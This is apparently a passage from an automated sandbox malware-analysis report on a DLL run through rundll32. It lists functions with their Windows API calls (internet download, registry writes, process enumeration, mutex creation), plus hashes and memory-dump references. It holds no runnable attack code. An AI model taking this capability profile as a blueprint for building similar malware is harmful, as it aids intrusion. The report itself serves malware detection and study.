                                                                                                                                      • Opcode Fuzzy Hash: 90fcbfe0a639a0e884f456d6610786c003b4ab0d1f1519b9cd6cd1c14ce8f7c2
                                                                                                                                      • Instruction Fuzzy Hash: 1C21C575D0014DBAEF21DB55DC45D9F7B7DDB852D0F20807AF608E6045DA319A818660
                                                                                                                                      Function 10006290 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38timeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 10003F0A: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 10003F1C
                                                                                                                                      • ___crtGetTimeFormatEx.LIBCMT ref: 100062BF
                                                                                                                                        • Part of subcall function 10003F24: InternetOpenUrlA.WININET(80000100,00000000,00000000,00000000,00000000,10006206), ref: 10003F39
                                                                                                                                      Strings
                                                                                                                                      • TW96aWxsYS80LjAgKGNvbXBhdGlibGUp, xrefs: 10006298
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InternetOpen$FormatTime___crt
                                                                                                                                      • String ID: TW96aWxsYS80LjAgKGNvbXBhdGlibGUp
                                                                                                                                      • API String ID: 1165476586-1918919809
                                                                                                                                      • Opcode ID: 6dd616fe18b4dc7dc232f498d1d56e002bf1131066ec89318103dde342ec69ca
                                                                                                                                      • Instruction ID: e1df23a7d6fc88136f19512af0817ca3ec1a39d4f872029b50130054e15d899c
                                                                                                                                      • Opcode Fuzzy Hash: 6dd616fe18b4dc7dc232f498d1d56e002bf1131066ec89318103dde342ec69ca
                                                                                                                                      • Instruction Fuzzy Hash: 61E0D832D089D238BA33E1671C0ED9F1EBDCBC7AF0B71402DF9489100EE8556485C0B5
                                                                                                                                      Function 100081F7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 48sleepCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep
                                                                                                                                      • String ID: C:\Program Files
                                                                                                                                      • API String ID: 3472027048-1387799010
                                                                                                                                      • Opcode ID: 0b87605fb27db1f7023582b05343b74cc78219c5ca49def8932e0796cb20e0c3
                                                                                                                                      • Instruction ID: 56f02aad9db059675602b225520acd96f5c1ff2d2c49edcd55a5b2e6f5f91b3a
                                                                                                                                      • Opcode Fuzzy Hash: 0b87605fb27db1f7023582b05343b74cc78219c5ca49def8932e0796cb20e0c3
                                                                                                                                      • Instruction Fuzzy Hash: FFF02236905AA1E6F701DFA449C068F776DFF122A1B210026F940BF046D7B59E454BE2
                                                                                                                                      Function 10023A16 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                      • Opcode ID: b61427312fc61e9c6b88e556fdd726292475e30fac531ace3744194929eb52a6
                                                                                                                                      • Instruction ID: d3f46d0872377fbe9fa7f64b626361dff41ba2d2c7fabe8822a04dc9c9058c51
                                                                                                                                      • Opcode Fuzzy Hash: b61427312fc61e9c6b88e556fdd726292475e30fac531ace3744194929eb52a6
                                                                                                                                      • Instruction Fuzzy Hash: 75F0697440C340EFC623EB18D48099EBFB2FF84390F915A5DB9C44B662EB358460C646
                                                                                                                                      Function 1000406C Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RegCreateKeyExA.KERNEL32(?,00000000,000F003F,00000000,?,00000000,00000000,80000001,10006D60,?,10006D60,80000001,00000000,00000000,REG_SZ,00000000), ref: 1000408A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Create
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                      • Opcode ID: 8241c048834319a8777681939fd791c1f2bb79611796acde0cc24ef85fc7be79
                                                                                                                                      • Instruction ID: 2e24eff2bcdac0d7bb79d22e3b0edd8e416dbe054c2d5b18b585679418e55d12
                                                                                                                                      • Opcode Fuzzy Hash: 8241c048834319a8777681939fd791c1f2bb79611796acde0cc24ef85fc7be79
                                                                                                                                      • Instruction Fuzzy Hash: 8DD0AE3200014EFBCF025F81ED05CDA3F6AFB0C2A9B068254FA1825030C777D9B1AB91
                                                                                                                                      Function 100040BA Relevance: 1.5, APIs: 1, Instructions: 10registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RegOpenKeyExA.KERNEL32(?,?,?,?,?), ref: 100040CC
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Open
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                      • Opcode ID: a195baf415497c3f6e756206114371a6254dc762b0ba02df47c96a08b610d07e
                                                                                                                                      • Instruction ID: 17287b262fc42a8ef4c3757039caf17c8ec33028492a73a8645d3109de99ba33
                                                                                                                                      • Opcode Fuzzy Hash: a195baf415497c3f6e756206114371a6254dc762b0ba02df47c96a08b610d07e
                                                                                                                                      • Instruction Fuzzy Hash: 40C0013200420EFBCF025F81EC058DA3F2AFB082A1B008010FE1804030C773D9B1EBA1
                                                                                                                                      Function 10003F0A Relevance: 1.5, APIs: 1, Instructions: 10networkCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 10003F1C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InternetOpen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2038078732-0
                                                                                                                                      • Opcode ID: 8fdbf6ddd27a1d6b462f044f687e1b09091a90aa3cf3341bbc8376c5064c6b07
                                                                                                                                      • Instruction ID: b95a3e5d4d1581b579a43ffb785aa3053a804adf9b6b5080047aec5b24f95343
                                                                                                                                      • Opcode Fuzzy Hash: 8fdbf6ddd27a1d6b462f044f687e1b09091a90aa3cf3341bbc8376c5064c6b07
                                                                                                                                      • Instruction Fuzzy Hash: 32C0013200020EFBCF025F81EC058DA7F2AFB092A0B008010FA1804031C733D971AB95
                                                                                                                                      Function 10003F41 Relevance: 1.5, APIs: 1, Instructions: 6filenetworkCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • InternetReadFile.WININET(?,?,?,?), ref: 10003F51
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileInternetRead
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 778332206-0
                                                                                                                                      • Opcode ID: 17794e789735475d89bbd1f9c593eb9d99e0ec2b66a06d8a24d179cffc3f724c
                                                                                                                                      • Instruction ID: 66c4406e5843dae4aa23aa47ff20fa86481cf42106c3819bfbf8a2f6b8e79ef1
                                                                                                                                      • Opcode Fuzzy Hash: 17794e789735475d89bbd1f9c593eb9d99e0ec2b66a06d8a24d179cffc3f724c
                                                                                                                                      • Instruction Fuzzy Hash: 20B00872519392ABDF02DF91CD4482ABAA6BB89301F084C5CF2A540071C7328428EB02
                                                                                                                                      Function 10003ECE Relevance: 1.5, APIs: 1, Instructions: 5synchronizationCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateMutexA.KERNEL32(?,?,?,10006B50,00000000,00000000,?,?,00000202,?), ref: 10003EDA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateMutex
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1964310414-0
                                                                                                                                      • Opcode ID: f03030767440787e5e8ee563cbeb237b89049fd46284869140ae0419c91515a8
                                                                                                                                      • Instruction ID: 0bba5641deb9fc7c6708226b57f3740a3060a6e77b98bc1f4937df3feb83fb0f
                                                                                                                                      • Opcode Fuzzy Hash: f03030767440787e5e8ee563cbeb237b89049fd46284869140ae0419c91515a8
                                                                                                                                      • Instruction Fuzzy Hash: 51B0093A408220BFDF025F90DD4880ABBA2BB88362F24C958F6A941031C7328420EB02
                                                                                                                                      Function 10003FF7 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetShortPathNameA.KERNEL32(?,?,?), ref: 10004003
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: NamePathShort
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1295925010-0
                                                                                                                                      • Opcode ID: b2e0d57d01f7aa481c28775ec103b2c79e6903a2f37fda92ba0980fa6487b9be
                                                                                                                                      • Instruction ID: 299f2b121c0b8d63d2f16659a91a8a26a6eb1e7383ee0b7c2fbbf344de06ce20
                                                                                                                                      • Opcode Fuzzy Hash: b2e0d57d01f7aa481c28775ec103b2c79e6903a2f37fda92ba0980fa6487b9be
                                                                                                                                      • Instruction Fuzzy Hash: BCB0097A509210BFDF025B91DE4880ABBA2AB89321F10C958F2A940031C7328520EB12
                                                                                                                                      Function 10004104 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • Process32First.KERNEL32(00000000,00000000), ref: 1000410C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FirstProcess32
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2623510744-0
                                                                                                                                      • Opcode ID: 4be810b948c5642b78a3303991c31d5753e2f497cabb41971bfbf009a223d646
                                                                                                                                      • Instruction ID: d0469a6573cf8832cc4e791a541241725128130187f64684ac8c75673cb250d8
                                                                                                                                      • Opcode Fuzzy Hash: 4be810b948c5642b78a3303991c31d5753e2f497cabb41971bfbf009a223d646
                                                                                                                                      • Instruction Fuzzy Hash: B8A00176509612ABDA42AB51CE4884ABEA2FBA8381F01C819F18940434CB3284A5EB12
                                                                                                                                      Function 10004115 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • Process32Next.KERNEL32(0000005C,0000005C), ref: 1000411D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: NextProcess32
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1850201408-0
                                                                                                                                      • Opcode ID: 96d6b844675e51e99f82aec0d05e68cf0a3385db677bffcb7afb410fd8c547f0
                                                                                                                                      • Instruction ID: 2ceb7d0ae5350f2ffb1294a1e21229299d690b4e3dcfc0507f8b466183483048
                                                                                                                                      • Opcode Fuzzy Hash: 96d6b844675e51e99f82aec0d05e68cf0a3385db677bffcb7afb410fd8c547f0
                                                                                                                                      • Instruction Fuzzy Hash: B1A00136408612ABDA42AB50CD4884ABEA2FBA8381F11C819F18941034CB3684A5EB12
                                                                                                                                      Function 10003FB7 Relevance: 1.5, APIs: 1, Instructions: 4processCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000000,00000000,10005931,00000002,00000000,00000000,00000000), ref: 10003FBF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateSnapshotToolhelp32
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3332741929-0
                                                                                                                                      • Opcode ID: 1e956e5b503a472c93e19a4642fd5130f6607d7bc175f230498bf039bbf47dc4
                                                                                                                                      • Instruction ID: ca46abfd3f4ae67059df7024880e3d5c8c44562ed1dec37196b9e10746ab925e
                                                                                                                                      • Opcode Fuzzy Hash: 1e956e5b503a472c93e19a4642fd5130f6607d7bc175f230498bf039bbf47dc4
                                                                                                                                      • Instruction Fuzzy Hash: D5A00136408212ABDA42AB50CD48D4AFFA2BBA8781F02C819F19980034CB32C5A5EB12
                                                                                                                                      Function 1000400A Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetDriveTypeA.KERNEL32(?,1000824C,1001593C), ref: 1000400E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DriveType
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 338552980-0
                                                                                                                                      • Opcode ID: 2ee3dedfe077572030ca3591167bf26a544b4eb7bba9e94adf73c1260513ac4d
                                                                                                                                      • Instruction ID: e310fc801df329cbdffcf5e880badee8d9e0b58f708c6ac467addbfbb1e58057
                                                                                                                                      • Opcode Fuzzy Hash: 2ee3dedfe077572030ca3591167bf26a544b4eb7bba9e94adf73c1260513ac4d
                                                                                                                                      • Instruction Fuzzy Hash: 029002305055119BDE015B10CE4940A7E71AB84701B00C4A4E04541130C7328810EE01
                                                                                                                                      Function 10004092 Relevance: 1.5, APIs: 1, Instructions: 3registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RegCloseKey.KERNEL32(?,10006DBE,?), ref: 10004096
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Close
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                      • Opcode ID: 2d988dbd5b15decafcf846d532543195a702f6c68f6a27351b5815321025a744
                                                                                                                                      • Instruction ID: c461232d01f39555025ee1551a6f08c036cd225bd5518e59674b318f5e785400
                                                                                                                                      • Opcode Fuzzy Hash: 2d988dbd5b15decafcf846d532543195a702f6c68f6a27351b5815321025a744
                                                                                                                                      • Instruction Fuzzy Hash: 799002705055119BDE415B11CF494097AA5AB84701B008458E04A41030C7318810EA01
                                                                                                                                      Function 10003EB4 Relevance: 1.5, APIs: 1, Instructions: 3networkCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • gethostbyname.WS2_32(00000000), ref: 10003EB8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3203263026.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 0000000B.00000002.3203170808.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203326019.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203355919.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203411016.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203509006.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 0000000B.00000002.3203563456.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: gethostbyname
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 930432418-0
                                                                                                                                      • Opcode ID: dcfbcd4351272649fb1253f470343220905ed4c20dbbca1a40d0a1126bf3fd71
                                                                                                                                      • Instruction ID: ddc175de635f80408d7ee48a1059bf0ffdd1ba2c9e36570999931cb834b2f0bc
                                                                                                                                      • Opcode Fuzzy Hash: dcfbcd4351272649fb1253f470343220905ed4c20dbbca1a40d0a1126bf3fd71
